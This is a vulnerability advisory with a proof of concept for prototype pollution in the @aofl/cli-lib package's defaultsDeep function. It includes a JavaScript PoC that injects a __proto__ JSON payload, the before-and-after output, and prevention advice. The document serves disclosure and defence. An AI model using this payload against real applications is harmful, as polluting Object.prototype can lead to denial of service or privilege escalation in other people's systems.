Prototype Pollution vulnerability affecting aofl/cli-lib module, version 3.14.0

[mestrtee]

All versions of this module are vulnerable to Prototype Pollution via defaultsDeep. The user's supplied value recursively copy all child properties to the destination without proper security validation.

An attacker can exploit this vulnerability by manipulate the prototype of Object by modify built-in Object.prototype through reachable special properties __proto__ or constructor.prototype. Potentially leading to the alteration of behavior of all objects and consequently, the attacker escalate the attack to denial of service, remote code execution or privilege escalation.

Call stack:

defaultsDeep (@aofl/cli-lib/modules/defaults.js:13)

PoC:

(async () => {
  const lib = await import('@aofl/cli-lib');
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}')

var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
	lib.defaultsDeep ({}, BAD_JSON)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Expected output after the patch:

Before Attack:  {}
After Attack:  {}

How to prevent:

• Freeze the root prototype using Object.freeze
• Require schema validation of JSON input.
• Avoid using unsafe recursive merge functions.
• Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.
• As a best practice use Map instead of Object